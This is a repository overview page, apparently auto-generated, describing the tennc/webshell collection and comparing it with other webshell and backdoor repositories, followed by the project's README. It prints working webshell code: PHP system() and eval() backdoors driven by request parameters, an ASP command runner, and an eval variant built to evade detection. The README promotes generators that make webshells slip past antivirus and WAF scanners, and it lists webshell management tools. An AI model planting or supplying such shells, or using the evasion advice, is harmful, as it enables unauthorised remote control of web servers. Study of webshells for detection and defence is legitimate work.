Convert Figma logo to code with AI

tennc logowebshell

This is a webshell open source project

10,004
5,566
10,004
1

Top Related Projects

Webshell && Backdoor Collection

绕过专业工具检测的Webshell研究文章和免杀的Webshell

Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. Do not host the file(s) on your server!

Weaponized web shell

Quick Overview

The tennc/webshell repository is a collection of various webshell scripts in different programming languages. Webshells are malicious scripts that allow remote administration of a web server. This repository serves as a resource for security researchers and penetration testers to study and understand different types of webshells.

Pros

  • Comprehensive collection of webshells in various languages
  • Useful for security research and understanding attack vectors
  • Regularly updated with new contributions
  • Provides a platform for studying and improving web security

Cons

  • Can be misused for malicious purposes
  • Some content may be considered illegal in certain jurisdictions
  • Lacks proper documentation and usage guidelines
  • May trigger antivirus software or security alerts

Code Examples

This repository is not a code library but a collection of individual webshell scripts. Therefore, code examples are not applicable in the traditional sense. However, here are a few snippets from different webshells in the repository to illustrate their nature:

PHP Webshell:

<?php
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
}
?>

This simple PHP webshell executes system commands passed through the 'cmd' parameter.

ASP Webshell:

<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = request("cmd")
If (szCMD <> "") Then
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
    End If
%>

This ASP webshell creates objects to interact with the system and execute commands.

Getting Started

As this is not a code library but a collection of potentially harmful scripts, there are no traditional "getting started" instructions. It's crucial to note that using these scripts on systems without proper authorization is illegal and unethical. This repository should only be used for educational purposes in controlled environments.

For security researchers or penetration testers interested in studying these webshells:

  1. Clone the repository: git clone https://github.com/tennc/webshell.git
  2. Review the scripts in a secure, isolated environment
  3. Always obtain proper authorization before testing on any systems
  4. Use the knowledge gained to improve web application security

Competitor Comparisons

Webshell && Backdoor Collection

Pros of WebShell

  • More organized structure with categorized directories
  • Includes additional tools and utilities beyond basic webshells
  • Actively maintained with recent updates

Cons of WebShell

  • Larger repository size, potentially slower to clone and navigate
  • May include more complex or advanced shells, increasing learning curve
  • Some shells may be detected more easily by antivirus software due to popularity

Code Comparison

webshell:

<?php @eval($_POST['pass']);?>

WebShell:

<?php
    $cmd = $_POST['cmd'];
    system($cmd);
?>

Both repositories contain various webshells in different programming languages. The example above shows a simple PHP webshell from each repository. webshell uses a more concise one-liner that evaluates POST data, while WebShell demonstrates a slightly more verbose approach using the system() function.

WebShell tends to include more feature-rich and complex shells, whereas webshell often focuses on simpler, more straightforward implementations. This difference in approach affects factors such as ease of use, detectability, and functionality.

Overall, both repositories serve as collections of webshells and related tools, with WebShell offering a broader range of utilities and webshell providing a more focused set of basic shells.

绕过专业工具检测的Webshell研究文章和免杀的Webshell

Pros of webshell-detect-bypass

  • Focuses specifically on bypassing detection mechanisms
  • Includes techniques for evading common security tools
  • More actively maintained with recent updates

Cons of webshell-detect-bypass

  • Smaller collection of webshells compared to webshell
  • Less diverse in terms of programming languages supported
  • More specialized, potentially less useful for general webshell research

Code Comparison

webshell-detect-bypass:

<?php
$a = $_POST['a'];
$b = $_POST['b'];
@eval("$a($b);");
?>

webshell:

<?php @eval($_POST['pass']);?>

The webshell-detect-bypass example uses multiple variables and a more complex structure to evade detection, while the webshell example is more straightforward but potentially easier to detect.

webshell-detect-bypass is tailored for bypassing security measures, making it useful for penetration testing and security research. However, its specialized nature may limit its broader applicability compared to webshell, which offers a more extensive collection of webshells in various languages.

webshell provides a comprehensive repository of webshells, making it valuable for studying different implementation techniques across languages. Its larger collection offers more diversity but may include outdated or easily detectable samples.

Both repositories serve different purposes within the webshell ecosystem, with webshell-detect-bypass focusing on evasion techniques and webshell offering a broader range of examples for research and analysis.

Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. Do not host the file(s) on your server!

Pros of php-webshells

  • More focused on PHP-specific webshells, providing specialized tools for PHP environments
  • Includes a variety of PHP-based webshells with different features and capabilities
  • Smaller repository size, making it easier to download and manage

Cons of php-webshells

  • Limited to PHP webshells only, lacking diversity in supported languages
  • Less frequently updated compared to webshell, potentially missing newer techniques or vulnerabilities
  • Smaller community and fewer contributors, which may result in slower development and bug fixes

Code Comparison

webshell example (PHP):

<?php @eval($_POST['pass']);?>

php-webshells example (PHP):

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

Both repositories contain simple PHP webshells, but php-webshells tends to include more feature-rich and complex implementations. The webshell example shows a basic one-liner for executing PHP code, while the php-webshells example provides a more structured approach with command execution and output formatting.

Weaponized web shell

Pros of Weevely3

  • More actively maintained with recent updates
  • Offers a wider range of features, including file management and network reconnaissance
  • Provides a stealthier approach with obfuscated PHP code

Cons of Weevely3

  • Steeper learning curve due to more complex functionality
  • Requires Python environment for operation, potentially limiting deployment options

Code Comparison

Weevely3 (obfuscated PHP payload):

<?php
$k="e45e329feb5d925b"; 
$kh="e45e329feb5d925b";
$kf="e45e329feb5d925b";
$p="HSXILtA5VuqNPWRj";

Webshell (typical PHP shell):

<?php
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
}
?>

Weevely3 focuses on obfuscation and stealth, while Webshell offers simpler, more straightforward code. Weevely3's approach makes detection more difficult but increases complexity. Webshell's simplicity allows for easier customization but may be more easily detected by security measures.

Both repositories serve as collections of web shells, but Weevely3 offers a more comprehensive toolkit with additional features beyond basic command execution. Webshell provides a wider variety of simple, ready-to-use scripts in multiple languages, making it more accessible for quick deployment in various environments.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

webshell | English | Türkiye

这是一个webshell收集项目

送人玫瑰,手有余香,如果各位下载了本项目,也请您能提交shell

本项目涵盖各种常用脚本

如:asp,aspx,php,jsp,pl,py

如提交各种webshell,请勿更改名称和密码

注意:所有shell 本人不保证是否有后门,但是自己上传的绝不会故意加后门

各位提交的,也请勿加后门

如发现存在后门代码,请issues 。

本项目提供的工具,禁止从事非法活动,此项目,仅供测试,所造成的一切后果,与本人无关。

在扩展一个项目

  1. webshell-venom
  2. 免杀webshell无限生成工具

免杀webshell无限生成工具(免杀一句话生成|免杀D盾|免杀安全狗护卫神河马查杀等一切waf)

Author : yzddmr6

https://github.com/pureqh/webshell

请自行鉴别后门

other webshell project (update 2021-04-03)

  1. xl7dev/WebShell
  2. JohnTroony/php-webshells
  3. BlackArch/webshells
  4. LandGrey/webshell-detect-bypass
  5. JoyChou93/webshell
  6. bartblaze/PHP-backdoors
  7. WangYihang/Webshell-Sniper
  8. threedr3am/JSP-Webshells
  9. DeEpinGh0st/PHP-bypass-collection
  10. lcatro/PHP-WebShell-Bypass-WAF
  11. tanjiti/webshellSample
  12. webshellpub/awsome-webshell
  13. tdifg/WebShell
  14. malwares/WebShell
  15. lhlsec/webshell
  16. oneoneplus/webshell
  17. vnhacker1337/Webshell
  18. backlion/webshell
  19. twepl/wso wso for php8

顺便在推一波网站管理工具

  1. 中国菜刀
  2. Cknife
  3. Altman
  4. xise
  5. Weevely
  6. quasibot
  7. Webshell-Sniper
  8. 蚁剑 antSword
  9. 冰蝎 Behinder
  10. webacoo
  11. 哥斯拉 Godzilla
  12. PhpSploit
  13. 以上排名不分先后

Author :tennc

http://tennc.github.io/webshell

license : MIT

Download link

Check github releases. Latest:

https://github.com/tennc/webshell/releases

Many thanks to Jetbrains for providing us with an OSS licence for their fine development tools such as Jetbrains tools.

Thanks to Cloudflare

Stargazers over time